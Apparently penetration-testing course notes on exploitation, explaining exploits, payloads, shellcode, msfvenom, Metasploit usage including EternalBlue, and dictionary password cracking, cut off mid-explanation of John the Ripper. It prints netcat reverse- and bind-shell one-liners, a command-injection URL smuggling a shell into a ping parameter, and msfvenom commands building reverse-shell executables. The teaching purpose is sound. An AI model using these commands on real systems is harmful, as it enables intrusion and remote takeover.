Exploitation

'The exploitation phase in penetration testing involves the deliberate attempt to capitalize on identified vulnerabilities.'

In the previous phase, vulnerability assessment, you identified a list of weaknesses.

For example, you might have found that a web server is running an outdated version of Apache with a known bug, or that a machine is missing a critical security patch.

The exploitation phase is where you take that theoretical weakness and try to turn it into a practical breach.

It's about using various tools, techniques, and exploits to breach the security defenses of the target environment.

The Ultimate Goal:

• Gain unauthorized access: You want to get a shell on the target system, a command prompt that lets you run commands as if you were sitting at that computer.

• Escalate privileges: Sometimes, the initial access you get is as a low-privileged user, like a guest or a standard user. You might be able to run some commands, but you can't install software or view sensitive files. Privilege escalation is the art of turning that limited access into full 'administrator' or 'root' access.

• Compromise sensitive data: The ultimate goal of a penetration test is often to demonstrate the business impact. So, you might exploit a server to find and extract a database of customer records, proving that the vulnerability poses a real risk to the company.

The key takeaway here is that exploitation is about demonstrating the potential impact of real-world attacks. You're not just saying, 'This is vulnerable.' You're saying, 'This is vulnerable, and here's exactly how an attacker could use it to steal your data.'

The Three Components:

A successful exploitation is made up of three core components working together:

Exploit, Payload, and Shellcode.

Exploit

'An exploit is a piece of software, code, or technique specifically designed to take advantage of a vulnerability in a system, application, or service to cause unintended behavior, often leading to unauthorized access, privilege escalation, or data exfiltration.'

Core ideas:

• 'A piece of software, code, or technique': An exploit isn't always a program you download. Sometimes it's a single line of code you type into a web form. Sometimes it's a specific sequence of actions you perform. It's the method of attack.

• 'Specifically designed to take advantage of a vulnerability': The exploit is built for the vulnerability. It's like a key cut specifically for a lock. You can't use a SQL injection to exploit XSS vulnerability; every exploit works against a specific type of weakness.

• 'To cause unintended behavior': This is the core of what an exploit does. The software developer intended for the program to do one thing. The exploit forces it to do something else. It tricks the program.
  • Example: A developer intends for a program to take a number (like an ID number) and use it to look up a user's name. That's the intended behavior.

  • Unintended behavior: An attacker sends a piece of SQL code instead of a number. The program, because of the vulnerability, doesn't treat it as a number. It treats it as a command and runs it. The unintended behavior is that the program now executes the attacker's SQL code, potentially dumping the entire database.

Example: SQL Injection

• Vulnerability: A web application that takes user input (like an ID from a URL) and inserts it directly into a SQL database query without any validation or sanitization.

• Type: SQL Injection Exploit.

• Tool: SQLMap. This is an automated penetration testing tool that detects and exploits SQL injection flaws. It's a powerful tool that automates the entire process.

• Command: sqlmap -u "http://target.com/page.php?id=1" --dbs

Let's dissect this command in excruciating detail.

• sqlmap: This is the command we type in the terminal to invoke the SQLMap tool.

• u: This is a command-line flag, short for -url. It tells SQLMap, "Hey, the target for this attack is the following URL."

• "http://target.com/page.php?id=1": This is the target URL. This is a classic example of a dynamic webpage. The page.php script takes a parameter called id from the URL. The programmer's intention is that the user will put a number here, like id=1, to view the page for the first item in a catalog. The vulnerability is that the application trusts this input. It takes whatever is in the id parameter and uses it to build a SQL query, like SELECT * FROM products WHERE id = 1. SQLMap's job is to replace that 1 with malicious SQL code to see if it can manipulate the query.

• -dbs: This is another flag. It stands for 'databases'. This tells SQLMap, "Once you successfully exploit the SQL injection, I want you to try to retrieve a list of all the databases on the target's database server."

So, in this example, the SQLMap tool, using a specific command, acts as the exploit to take advantage of the SQL Injection vulnerability.

Public Exploits

A very important question arises: Do you have to write every exploit from scratch yourself? The answer is a resounding no. That would be an incredibly time-consuming and highly specialized task. The security community thrives on sharing knowledge. This is where public exploits come into play.

Public exploits are tools, scripts, or proof-of-concept codes that are made freely available for known vulnerabilities. They are used by penetration testers, security researchers, and, yes, malicious attackers. The advantage is that they speed up the exploitation process. If a vulnerability is discovered and a reliable exploit is published, you can often have a working attack within minutes.

Where do we find these exploits?

1. Exploit-DB (exploit-db.com):

This is the go-to resource. It's a massive, publicly accessible archive maintained by Offensive Security, the same company that develops Kali Linux. It's like a library of exploits. They are meticulously cataloged and organized.

A key tool that comes with Kali Linux is searchsploit. This is a command-line utility that allows you to search a local, offline copy of Exploit-DB directly from your terminal. This is incredibly useful when you're in the middle of a penetration test and don't want to open a browser.

• How to use searchsploit:
  • Let's say you've scanned a target and found it's running an FTP server called 'ProFTPD' version 1.3.5. You want to know if there's a public exploit for it.

  • You would open a terminal and type: searchsploit proftpd 1.3.5

  • searchsploit will then search its database and return a list of any exploits that match that software and version. It will show you the path to the exploit code on your Kali machine, allowing you to examine and use it immediately.

2. Packet Storm (packetstormsecurity.com):

This is another long-standing security resource site. It publishes security news, tools, and, yes, a large collection of exploits. It's a great alternative to Exploit-DB.

3. GitHub Repositories:

Security researchers often publish their proof-of-concept exploit code on GitHub. It's very common to search GitHub for a vulnerability's CVE ID (like CVE-2021-41773) and find working exploit code.

Payload

The payload is the actual data or code that the threat actor delivers to the target.

Purpose:

The payload contains the malicious commands necessary to achieve the attacker's objectives. The exploit gets the payload into a position where it can be executed.

Example: The Netcat One-Liner

nc -e /bin/sh <IP> <port>.

nc -e /bin/sh <IP> <port> uses Netcat to connect to a remote machine at the specified IP and port, then attaches /bin/sh (a shell) to that connection, effectively giving the remote side a command shell on the system (commonly called a reverse shell).

Looking at this specific line:

nc -e /bin/sh <IP> <port>

This line by itself is just the payload, not the exploit.

Why? Because this command is the malicious content delivered, it’s what actually gives you the shell.

Where’s the exploit then?

The exploit is whatever let you run this command on the target.

Example scenario (command injection):

• Vulnerability: A web app takes a ping parameter but doesn’t sanitize input:

  http://target.com/ping?ip=127.0.0.1

  The app runs: ping 127.0.0.1

• Exploit: The attacker injects a command separator and their payload:

  http://target.com/ping?ip=127.0.0.1; nc -e /bin/sh 10.0.0.1 4444

  • The exploit technique = command injection

  • The exploit code = ; nc -e /bin/sh 10.0.0.1 4444 (the whole malicious input)

  • The payload = nc -e /bin/sh 10.0.0.1 4444 (just the netcat part)

Types of Payload

1. Reverse Shell

A reverse shell is the most common type of payload used in modern network exploitation.

• How it works: Instead of the attacker connecting to the victim, the attacker sets up a "listener" on their own machine. The payload executed on the target machine then initiates a connection back (outward) to the attacker's listener.

• Why it's used? Why is this the most common type? The answer is firewalls.

  Firewalls are designed to protect a network by controlling traffic that crosses its boundary.

  A typical corporate firewall has a default policy: block all incoming connections from the internet. They do this to prevent external attackers from just reaching in and connecting to internal servers.

  However, they must allow some outgoing connections.

  Employees need to browse the web (port 80/443), check email, and use other internet services. A reverse shell cleverly abuses this trust. The target, which is inside the protected network, initiates an outgoing (External) connection.

  To the firewall, this just looks like a user browsing the web or connecting to an external service. It's very difficult for a firewall to distinguish malicious shell traffic from legitimate web traffic, especially if it's on a common port like 80 or 443.

  ATTACKER MACHINE                    TARGET MACHINE
  (Your computer)                     (Victim)
  
  1. nc -lvnp 4444                   
     (Listens on port 4444)
     └── Waiting for connection...  ────────────────────────────┐
                                     
                                      2. nc -e /bin/sh 192.168.1.100 4444
                                      (Initiates connection back to attacker)
                                      ┌─────────────────────────┘
                                      ↓                         
  3. Connection received!             │
     ┌────────────────────────────────┘
     │
  4. You type: whoami ──────────────────┐
                                        ↓
                                   Command executes:
                                   /bin/sh -c "whoami"
                                        │
  5. You see output: "root" ←───── Results ──┘
  
  Key characteristics:
  - Target connects OUT to attacker
  - Bypasses inbound firewall rules
  - Requires attacker to have a listener running
  - More stealthy in monitored environments

2. Bind Shell

A bind shell works in the opposite direction of a reverse shell.

• How it works: The payload executed on the target machine opens up a specific port (it "binds" a shell to that port) and waits/listens for an incoming connection. The attacker then proactively connects to that open port to gain control.

• Why it's used: Bind shells are less common today because they require the target to accept an incoming connection, which firewalls usually block. However, They are most effective when:
  • The target is not behind a firewall that blocks inbound connections. For example, a server directly on the internet with a public IP address and no firewall.

  • You have a reason why the target cannot make an outbound connection. Perhaps there's a very strict firewall that only allows outbound connections on a few specific ports, and none of them are available to you.

  • You are already inside a network and moving laterally. You might plant a bind shell on a machine inside the network and then connect to it from another compromised machine within that same network, bypassing the perimeter firewall entirely.

ATTACKER MACHINE                     TARGET MACHINE
(Your computer)                      (Victim: 10.0.0.2)

                                     1. nc -lvnp 5555 -e /bin/sh
                                        (Opens port 5555 and LISTENS)

2. nc 10.0.0.2 5555  ──────────>     (Attacker connects IN to the target)

3. Connection established!
4. You type "ls"     ──────────────┐
                                   ↓
                            /bin/sh executes "ls"
                                   │
5. You see files     <── results ──┘

Key characteristics:
- Attacker connects TO target
- May be blocked by inbound firewalls
- Target must have the port accessible
- Useful when target can't make outbound connections

3. Command Execution

Command execution (often called Remote Code Execution or RCE) is not necessarily an interactive, continuous session like a shell.

• How it works: The attacker exploits a vulnerability that allows them to pass a specific, arbitrary command to the system's operating system, which the system executes blindly.

• Why it's used: An attacker might use command execution to perform quick reconnaissance (e.g., whoami or id to see user privileges) or, very commonly, they will use command execution to download and execute a more complex Reverse Shell payload to get a stable, interactive session.

ATTACKER MACHINE                     TARGET MACHINE
(Your computer)                      (Vulnerable Web Server)

1. Send malicious HTTP request ───>  2. Vulnerable application processes input
   e.g., http://target.com/?cmd=id      (e.g., OS Command Injection flaw)

                                     3. System executes the "id" command
                                        in the background
                                                    │
4. HTTP Response returns ────────────<── results ───┘
   "uid=33(www-data)"
   
Key characteristics:
- Single command execution (no persistent shell)
- Common in:
  • Web applications
  • API endpoints  
  • File upload functions
  • Input validation bypasses

Reverse/Bind Shell Examples

Reverse Shell:

nc -e /bin/bash <IP> <PORT>.

Let's break it down:

• The Context (When do I use it?): Imagine you've already found a way to run a single command on a target system. Maybe you found a vulnerability that lets you execute OS commands, like a command injection flaw in a web application. You can't upload a file, but you can type a command and it will run. This netcat command is your payload.

• nc: This calls the program netcat.

• e /bin/sh: This is the crucial part. The e flag stands for 'execute.' It tells netcat, "After you establish a connection, execute the program /bin/sh (the Bourne shell) and connect its standard input and output to the network socket."

  This means that anything the remote user types will be sent to the shell, and any output from the shell will be sent back over the network.

• <IP>: This is the IP address of the attacker's machine. This is where the connection should go.

• <port>: This is the port on the attacker's machine to connect to.

So, if you can get a Linux target to execute this payload, it will:

• Launch netcat.

• Netcat will initiate an outbound TCP connection to your machine (<IP>) on the specified port (<port>).

• Once the connection is established, netcat will execute /bin/sh and link it to the connection.

You, the attacker, sitting at your machine with a netcat listener running on that port, will suddenly have a command-line shell on the target. This entire command string, nc -e /bin/sh 192.168.1.100 4444, is a payload. It's the data delivered to achieve the objective.

Bind Shell:

nc -lvv 4444 -e /bin/bash.

• Command Breakdown:
  • nc: Calls netcat.

  • l: This is the listen flag. It tells netcat to act as a server and wait for an incoming connection.

  • vv: This stands for 'very verbose.' It makes netcat print out detailed information about what it's doing, which is helpful for debugging.

  • 4444: The port number to listen on.

  • e /bin/bash: Same as before, execute a shell and bind it to this listener.

• What it does: In a bind shell, the target machine opens a port on itself and 'binds' a shell to it. It then sits and listens for an incoming connection. The attacker then acts as the client and connects to that port on the target. The command nc <target_ip> 4444 on the attacker's machine would connect to this bind shell.

Tools for Reverse/blind Shells:

• Netcat.

• revshells.com: This is an invaluable online resource. It has a generator that lets you select your operating system (Linux, Windows, Mac) and your language (Python, PHP, Netcat, Powershell, etc.), enter your IP and port, and it will instantly generate the one-liner command for you. This is a tool you will use constantly.

• Pentestmonkey Reverse Shell Cheat Sheet: Pentestmonkey is a popular security blog, and their reverse shell cheat sheet is a classic collection of one-liners for various languages. It's a great reference to have bookmarked.

Shellcode

'a small, carefully crafted piece of code used as a payload during exploitation. It is typically written in assembly and designed to be injected and executed as part of an exploit.'

Core Ideas:

• 'A small, carefully crafted piece of code': Shellcode is not a full application. It's a snippet. It's tiny code.

  Why? Because the space an exploit has to inject code is often extremely limited. A buffer overflow exploit, for example, might only be able to inject a few hundred bytes of code. You can't fit a full program in that space.

• 'Typically written in assembly': 

  Assembly language is the lowest-level human-readable programming language.

  Each assembly instruction corresponds directly to one machine instruction that the CPU executes.

  This gives the shellcode writer absolute control over what the computer does, allowing them to create the smallest and fastest code possible. It's not like writing in Python or Java. It's raw, it's powerful, and it's difficult.

Writing shellcode in assembly is a highly specialized skill. It's not something a typical penetration tester does on every job. We use tools to automate this. The primary tool is msfvenom .

Tools - MSFvenom:

It's a payload generator that comes with the Metasploit framework.

You tell this tool what you want, and it gives you the tiny, crafted assembly code (in the format you need) to do it.

Example Usage (The Anatomy of an msfvenom command):

msfvenom -p <payload> LHOST=<attacker_ip> LPORT=<attacker_port> -f <format>

Command Breakdown:

• msfvenom: This calls the tool.

• p <payload>: This is the -payload flag.

  It's where you tell msfvenom what you want the shellcode to do. Do you want a reverse shell? A bind shell? Something else? The payload name you choose here determines the core behavior.

  For example, linux/x86/shell_reverse_tcp is a payload that creates a reverse shell.

• LHOST=<attacker_ip>: This is an option for the payload.

  The payload we chose (shell_reverse_tcp) needs to know where to connect back to. It needs to know the IP address of our attacker machine. 

• LPORT=<attacker_port>: This is another option for the payload. It tells the shellcode which port on your attacker machine to connect back to. You'll need to set up a listener on this port to catch the incoming connection. 

• f <format>: This is the -format flag. It tells msfvenom what kind of output you need.

  Do you need the shellcode as raw hexadecimal bytes to inject into a buffer overflow? You'd use f raw or f hex.

  Do you need it as a standalone executable for Windows? You'd use f exe.

  For Linux, you'd use f elf.

  For a Python script, you'd use f python.

Shellcode Example

The slide shows you what shellcode actually looks like in two different forms. To the untrained eye, it's complete gibberish, and that's the point.

• In Hex form: 

  You see a long string of characters like 49, 407, 860, and 349.

  This is the shellcode represented as hexadecimal numbers.

  Each pair of characters (like 49) represents a single byte of machine code.

  This is the raw, binary data that gets injected into memory. It's not meant to be read by humans; it's meant to be executed by the CPU.

  You might see this format if you're looking at an exploit script that's about to inject the code, or if you're analyzing a piece of malware.

• In Assembly form: 

  This is the same code, but represented as assembly language instructions.

  This is much closer to something a human can read and understand, if they're trained.

  For example, an instruction might be mov eax, 0x90, which means 'copy the hexadecimal value 90 into the CPU register called EAX.'

  Another instruction might be int 0x80, which is a software interrupt used to make a system call to the Linux kernel.

  This form is what exploit developers work with. They write assembly code, then use an assembler (a program) to convert it into the raw hex that the computer needs.

The key takeaway is that whether you see it as hex or as assembly, it is the same thing: a tiny, powerful set of instructions designed to give an attacker control.

Introduction to MSFVenom

MSFVenom is not a standalone tool; it's a critical component of the larger Metasploit Framework. Think of Metasploit as a massive toolbox, and MSFVenom is the dedicated tool for creating custom payloads and shellcodes.

msfvenom is a command-line utility. It replaced two older tools, msfpayload and msfencode, combining their functionality into one, more efficient tool. Its sole purpose is to generate payloads.

Key Features:

• Payload Generation: This is its primary job. It has a massive database of payloads for virtually every combination of operating system (Windows, Linux, macOS, Android) and architecture (x86, x64, ARM, MIPS). Need a reverse shell for a 64-bit Windows machine? It's there. Need a bind shell for an older 32-bit Linux server? It's there. Need a payload that just adds a local user on a macOS system? It's probably there.

• Flexibility: The user has incredible control. You can specify the exact payload type, the target architecture (x86, x64, ARM, etc.), the operating system, and you can even apply encoders to try and evade detection.

MSFVenom Usage / Commands

Basic Syntax:

msfvenom -p <PAYLOAD> LHOST=<IP> LPORT=<PORT> -f <FORMAT> -o <OUTPUT>

• p <PAYLOAD>: This is your most important choice. You are telling msfvenom which behavior you want. Payload names follow a logical structure. Let's break down linux/x86/meterpreter/reverse_tcp:
  • linux: The target operating system.

  • x86: The target architecture (32-bit).

  • meterpreter: This is a special, advanced payload from Metasploit. Meterpreter is a powerful, in-memory payload that runs entirely in memory and doesn't touch the hard drive, making it stealthy. It provides a dynamic shell with many built-in commands for post-exploitation.

  • reverse_tcp: The connection method. It will connect back to us over TCP.

• LHOST=<IP>: This is an option for the payload. LHOST stands for 'Local Host.' This is a required option for any payload that needs to connect back to you (like reverse shells). You must set this to the IP address of your attacking machine. How do you find your IP? On Linux, you can use the ip addr or ifconfig command. It's crucial to get this right; if it's wrong, the target will try to connect to a non-existent machine.

• LPORT=<PORT>: This is another payload option. LPORT stands for 'Local Port.' This is the port on your attacking machine that you want the target to connect to. You can choose any port that isn't already in use. Common choices are 4444, 8080, or 53. Using common ports like 80 (HTTP) or 443 (HTTPS) can sometimes help the traffic blend in, but these ports often require root privileges to listen on.

• f <FORMAT>: This is the -format flag. It tells msfvenom how to package the payload. This is critical. Are you going to use this payload in a buffer overflow exploit? You'll need it as raw C code or hex bytes (f c or f raw). Are you going to host it on a web server for a victim to download? You might want it as an executable (f exe for Windows, f elf for Linux). Are you going to embed it in a Python script? Use f python.

• o <OUTPUT>: This is the -output flag. It tells msfvenom to save the generated payload to a file with the name you provide. If you don't use this, the payload will just be printed to the screen, which can be messy for binary files.

Concrete Example Walkthrough:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell.elf

Here's exactly what this command does, step-by-step:

• msfvenom : The tool starts.

• p linux/x86/meterpreter/reverse_tcp : It loads the instructions for the 'meterpreter reverse tcp' payload designed for a 32-bit Linux system.

• LHOST=192.168.1.10 : It takes the value 192.168.1.10 and embeds it into the payload as the destination IP address.

• LPORT=4444 : It takes the value 4444 and embeds it as the destination port.

• f elf : It takes the completed payload code and packages it into the ELF (Executable and Linkable Format) file format, which is the standard executable format for Linux.

• o shell.elf : It takes that ELF-formatted payload and writes it to a file named shell.elf in your current working directory.

After running this command, you will have a file called shell.elf. If you can find a way to transfer this file to a Linux target and get the target to execute it, it will initiate a reverse meterpreter shell back to your machine at 192.168.1.10:4444.

Introduction to Metasploit

The Metasploit Framework is an open-source platform for developing, testing, and executing exploit code. It's one of the most powerful and widely used tools in the entire field of cybersecurity.

Think of it as a massive, integrated library of hacking tools, all accessible through a single, consistent interface. It's not just for exploitation; it covers the entire penetration testing lifecycle.

Purpose:

Why is Metasploit so important? It solves a massive practical problem. In the early days of penetration testing, if you found a vulnerability, you had to:

• Find a public exploit (often a messy, poorly documented script).

• Download it.

• Figure out what programming language it was written in.

• Install the correct compiler or interpreter.

• Try to compile or run it, often fighting with syntax errors.

• Figure out its command-line arguments.

• Finally, if you were lucky, run it against your target.

This process was slow, error-prone, and required a lot of manual effort for every single exploit. Metasploit changed all of that. It provides:

• It simplifies the process: You select an exploit module, set a few options (like the target IP), select a payload, and run it. The framework handles the complex interaction between the exploit and the payload.

• Vast collection: It contains exploit modules for countless vulnerabilities. It also has a huge collection of payloads, auxiliary modules for scanning and fuzzing, and post-exploitation modules for things like hash dumping and privilege escalation. It's a one-stop-shop for a penetration tester.

Metasploit Features

Each module:

• Has a defined purpose

• Accepts configurable options (target IP, port, credentials, etc.)

• Follows a consistent structure

• Can be combined with other modules

• Exploit Modules

These are modules specifically designed to take advantage of vulnerabilities in systems or applications.

• They target known weaknesses (e.g., buffer overflows, misconfigurations).

• Their job is to deliver a payload to the target.

• Think of the exploit as the delivery mechanism.

👉 Without an exploit, there is no entry point.

• Auxiliary Modules

These modules are mainly used for reconnaissance and information gathering.

• Port scanning

• Service enumeration

• Brute-force attacks

• SMB/FTP/HTTP scanning

They don’t necessarily compromise the system — they help you gather intelligence before exploitation.

👉 These are heavily used during the reconnaissance and scanning phases.

• Payloads

• Opens a reverse shell

• Binds a shell to a port

• Executes a command

• Uploads/downloads files

• Encoders

Encoders modify payloads to avoid detection.

• Obfuscate payload signatures

• Help bypass basic antivirus or IDS detection

• Reformat payload structure

They don’t change what the payload does — they change how it looks.

• NOPs (No Operation Instructions)

NOPs are used mainly in buffer overflow exploitation.

• Context: Imagine a buffer overflow exploit where the target expects the shellcode to start exactly at memory address 0x00A1F355, but due to system variations, your shellcode lands at 0x00A1F352.

• How it works: You fill the space between where your code actually starts and where it should start with NOPs (\x90 on x86 systems). The CPU reads "Do nothing" until it slides perfectly into the start of the real payload. This is called a "NOP Sled."

• Post-Exploitation Modules

These are used after you gain access to a system.

• Credential dumping

• Privilege escalation

• Lateral movement

• System enumeration

This phase focuses on expanding access and gathering deeper intelligence.

• Meterpreter

Meterpreter is an advanced, powerful payload.

• Runs in memory (stealthier)

• Provides an interactive shell

• Allows file access, process migration, screenshot capture, keylogging, and more

It’s essentially a full-featured post-exploitation environment.

• Listeners & Handlers

These manage connections between the attacker and the compromised system.

• Wait for reverse shells

• Handle incoming sessions

• Maintain communication channels

Without a handler, your payload wouldn’t know where to connect back.

Note:

Metasploit is structured to support the entire attack chain:

Recon → Exploit → Payload Execution → Post-Exploitation → Session Management

Each module type plays a specific role, and together they form a complete offensive testing framework.

Metasploit Basic Commands

• Launch Metasploit Console - msfconsole: This is the command you type in your Kali Linux terminal to start Metasploit. It will open up the Metasploit interface, which has its own prompt (usually msf6 >). This is your command center.

• Update Metasploit - msfupdate: This command will download the latest modules and updates.

• Search for modules - search <keyword>: If you know a vulnerability name, a software name, or a CVE ID, you can search for it.
  • Example: search apache log4j or search eternalblue.

  • Metasploit will return a list of modules matching your search, with a number next to each one.

• Check module options - show options: Once you've selected a module (using the use command), you need to see what information it requires. Every module needs certain options to be set. Typing show options will display a table with:
  • Option Name: e.g., RHOSTS (Remote Hosts, the target IP), RPORT (Remote Port).

  • Current Setting: The current value, if any.

  • Required: Yes or No.

  • Description: What the option is for.

• Set option parameters - set <option_name> <value>: This is how you configure the module. You tell Metasploit what the target IP is, what port to attack, etc.
  • Example: set RHOSTS 192.168.1.100 or set RPORT 445.

Metasploit Exploit Module

An exploit module is a piece of code within the Metasploit framework that is specifically written to target a single, known vulnerability in a particular piece of software or hardware. Each module contains all the logic, the shellcode, and the techniques needed to trigger that vulnerability. The exploit module's job is to deliver a payload to the target.

Example Command:

use exploit/<platform>/<exploit_name>

This is the command you use to select an exploit module.

• exploit/: This tells Metasploit that we're looking in the directory for exploit modules.

• <platform>/: This is the platform or service the exploit targets. Common ones are windows/, linux/, multi/ (for exploits that work on multiple platforms), webapps/ (for web applications like WordPress or Joomla).

• <exploit_name>: This is the specific, unique name of the exploit. It often includes the CVE number or a descriptive name.

Concrete Example:

To use the famous EternalBlue exploit that targets a vulnerability in Windows SMB, you would type:

use exploit/windows/smb/ms17_010_eternalblue

Let's dissect this path:

• exploit/: We're using an exploit.

• windows/: The target platform is Windows.

• smb/: The vulnerable service is SMB (Server Message Block, used for file sharing).

• ms17_010_eternalblue: This is the exploit's name. ms17_010 refers to the Microsoft Security where the vulnerability was announced. eternalblue is the code name given to the exploit.

Usage:

After you type this command, your Metasploit prompt will change to show you're now inside that module: msf6 exploit(windows/smb/ms17_010_eternalblue) >.

From here, your next steps are always the same:

• show options to see what you need to configure. For this exploit, you'll almost certainly need to set RHOSTS (the target IP).

• set RHOSTS <target_ip> to configure the target.

• show payloads to see a list of compatible payloads you can use with this exploit. You need to choose what you want to happen after the exploit succeeds.

• set PAYLOAD <payload_name> to choose one, like windows/x64/meterpreter/reverse_tcp.

• show options again to see if your chosen payload has any options you need to set, like LHOST and LPORT.

• set LHOST <your_ip> and set LPORT <your_port>.

• Finally, type run or exploit to launch the attack.

Payloads - Stageless

Stageless payload is self-contained. Imagine a it as a single, complete package.

It contains everything it needs to perform its function.

The entire program: The code to connect back, the code to spawn a shell, everything is all in one file.

• Characteristics:
  • File Size: Because it contains the entire program, the file size is relatively large. For a simple reverse shell, it might be a few hundred kilobytes. For more complex payloads, it could be megabytes.

  • Complexity: It's a relatively complex, standalone program.

  • Reliability: It is very reliable. It's a single-step process. Once the target executes that single file, the payload runs and does its job. There's no need for it to download any further code.

• When to use it? Stageless payloads are excellent when you have no size constraints. If you can upload or deliver a file of any size, a stageless payload is often the most stable and straightforward choice.

• How to identify it in msfvenom? Look at the payload name. In msfvenom, stageless payloads often (but not always) use underscores in the name. For example:
  • windows/meterpreter_reverse_tcp (Notice the underscore between meterpreter and reverse) is the stageless version.

  • linux/x86/shell_reverse_tcp is another example of a stageless payload.

Payloads - Staged

More complex, but often more practical, option: Staged Payloads.

A staged payload is not a single, complete program. It's a multi-step process. It works in two (or more) stages.

• Stage 1 (The Stager): The initial executable you deliver is very small. Its only job is incredibly simple: connect back to the attacker's machine and download a second, larger piece of code. It's a tiny, minimal program, sometimes called a 'stager' or a 'dropper.' It's designed to fit into very small memory spaces.

• Stage 2 (The Stage): This is the actual, full-featured payload. It's the meterpreter shell, the full reverse shell, or whatever you ultimately want. The stager downloads this stage into the target's memory and then executes it.

• Why use a staged payload? There are two primary, compelling reasons:
  • Size Constraints: This is the most important reason. Many exploits, especially those involving memory corruption like buffer overflows, have a very limited amount of space in which to inject code.

    They might only be able to fit 300 or 400 bytes. A full, stageless payload is often 50KB or more; it’s way too big to fit. But a tiny stager, maybe 200 bytes, can fit perfectly.

  • Stealth: The stager is small and simple, and its only job is to download something. This can sometimes be stealthier than having a large, complex program that might be detected by antivirus.

• How to identify it in msfvenom? The naming convention is key. Staged payloads use forward slashes in their names.
  • Example: windows/meterpreter/reverse_tcp is the staged version.

  • Example: linux/x86/shell/reverse_tcp is also a staged payload.

To summarize, with a staged payload, you still only generate and deliver one file to the target. But that one file is not the final payload; it's the stager. The stager's job is to go and fetch the final payload from you. This makes it a two-stage process.

Staged & Non-Staged Payloads

• Windows:
  • Staged: msfvenom -p windows/meterpreter/reverse_tcp ... (Forward slash: /)

  • Stageless: msfvenom -p windows/meterpreter_reverse_tcp ... (Underscore: _)

• Linux:
  • Staged: msfvenom -p linux/x64/meterpreter/reverse_tcp ... (Forward slash: /)

  • Stageless: msfvenom -p linux/x64/meterpreter_reverse_tcp ... (Underscore: _)

We can use these types of payloads on Metasploit and MSFVenom.

Metasploit Payloads

In the context of Metasploit, after you've selected an exploit module, you still need to choose a payload.

Commands within Metasploit:

• show payloads: When you have an exploit module selected (for example, after you've typed use exploit/windows/smb/ms17_010_eternalblue), typing show payloads will display a list of all payloads that are compatible with that specific exploit.

  This is a massive time-saver. Instead of scrolling through a list of thousands of payloads, Metasploit filters it down to just the ones that are known to work with the exploit you're using. You'll see staged and stageless versions listed here, with their full names like windows/meterpreter/reverse_tcp and windows/meterpreter_reverse_tcp.

• set PAYLOAD <payload_name>: This is how you choose one.

  For example, after seeing the list, you might type 

  set PAYLOAD windows/x64/meterpreter/reverse_tcp.

Once you've set the payload, it's good practice to type show options again. Why? Because the payload itself might have its own options that need to be configured.

The exploit needed RHOSTS. The payload might need LHOST and LPORT. You need to set those as well before you run the exploit.

Metasploit Auxiliary

Metasploit is much more than just exploits and payloads. It has a massive collection of modules for tasks that aren't exploitation. These are called Auxiliary Modules.

Auxiliary modules are tools designed for specific tasks such as reconnaissance, scanning, fuzzing, and denial of service.

They are not exploits. They do not deliver a payload. They don't give you a shell. Instead, they perform supporting roles that help you gather information, test the availability of services, or prepare for a later exploit.

What can Auxiliary modules do? Here are some common categories:

• Scanner Modules: They can scan networks for open ports, but they can do much more than a simple port scan. For example, there are modules that:
  • auxiliary/scanner/smb/smb_login: Attempts to brute-force login credentials against an SMB service.

  • auxiliary/scanner/ssh/ssh_login: Attempts to brute-force SSH logins.

  • auxiliary/scanner/http/wordpress_scanner: Enumerates information from a WordPress site, like installed plugins and themes.

  • auxiliary/scanner/portscan/tcp: A basic TCP port scanner.

• Fuzzer Modules: These modules are used to send malformed, unexpected, or random data to a service or application. The goal is to cause a crash or an unexpected behavior that might reveal a vulnerability. For example, there are HTTP fuzzers, FTP fuzzers, and more.

• Denial of Service (DoS) Modules: These modules are designed to overwhelm a service, causing it to crash or become unavailable to legitimate users. These should be used with extreme caution and only with explicit written permission.

Example Command:

• show auxiliary: Typing this in the Metasploit console will display a massive list of all the auxiliary modules available.

• use auxiliary/<category>/<module_name>: This is how you select one.
  • Example: use auxiliary/scanner/portscan/tcp

  • This selects the module for performing a TCP port scan. Once you've used it, the process is the same as with an exploit: you type show options, set the required options (like RHOSTS for the target IP range), and then type run to execute the scan.

Usage:

Auxiliary modules are used throughout a penetration test. You might use them during the initial reconnaissance phase to scan for open ports and services. You might use them during the vulnerability assessment phase to try to brute-force weak passwords. They support the main exploitation effort.

Password Cracking

The Core Concept: Hashing vs. Cracking

Before we talk about tools, we need to understand how systems store passwords. They do not store your password as plain text, like 'P@ssw0rd'. That would be a massive security disaster. Instead, they store a hash.

• What is a hash? A hash is the output of a one-way mathematical function. You put a password in, and the function produces a fixed-length string of characters. For example:
  • Input: password123

  • MD5 Hash: 482c811da5d5b4bc6d497ffa98491e38

• One-way function: You cannot take the hash 482c811da5d5b4bc6d497ffa98491e38 and mathematically reverse it to get password123. The only way to 'reverse' it is to guess.

So, how does password cracking work?

'Password cracking is the process of attempting to recover passwords after they were hashed using a wordlist.'

Let's break that process down into steps.

• Obtain the Hashes: First, an attacker (or a penetration tester) needs to obtain the file containing the password hashes. This might be done by exploiting a vulnerability to read the /etc/shadow file on Linux or the SAM database on Windows. This is often a post-exploitation step.

• Prepare a Wordlist: A wordlist is a simple text file, with one potential password on each line. The most famous wordlist in Kali Linux is rockyou.txt. It contains millions of real-world passwords that were leaked in a data breach. It's a dictionary of common, weak passwords.

• The Cracking Process: The cracking tool (like John the Ripper or Hashcat) takes the first word from the wordlist, say password. It hashes that word using the same algorithm the target system used (e.g., MD5). It then compares the resulting hash (e.g., 5f4dcc3b5aa765d61d8327deb882cf99) with the stolen hash from the target (e.g., 482c811da5d5b4bc6d497ffa98491e38).

• Check for a Match:
  • If the hashes match, the tool has discovered that the target's password is password. Success!

  • If the hashes do not match, the tool moves to the next word in the wordlist, say 123456, hashes it, and compares again.

• Repeat: This process repeats, often millions of times, until a match is found or the wordlist is exhausted. This is why it's called a dictionary attack.

This entire process demonstrates the importance of using strong, complex passwords that are not found in any dictionary or wordlist.

Password Cracking - John

John the Ripper is a fast, free, and open-source password cracking tool. It's one of the most popular and trusted tools in the industry and comes pre-installed on Kali Linux. It's designed to detect weak passwords by performing the dictionary attack we just described.

How it works:

John takes a file that contains password hashes (let's call it hashes.txt). It also needs a wordlist. John will then read each word from the wordlist, hash it using the appropriate algorithm, and compare it to the hashes in your file. If it finds a match, it prints the cracked password to the screen.

Basic Usage:

The most common syntax is: john --wordlist=<path_to_wordlist> <hash_file>

Let's break this down.

• john: This invokes the John the Ripper program.

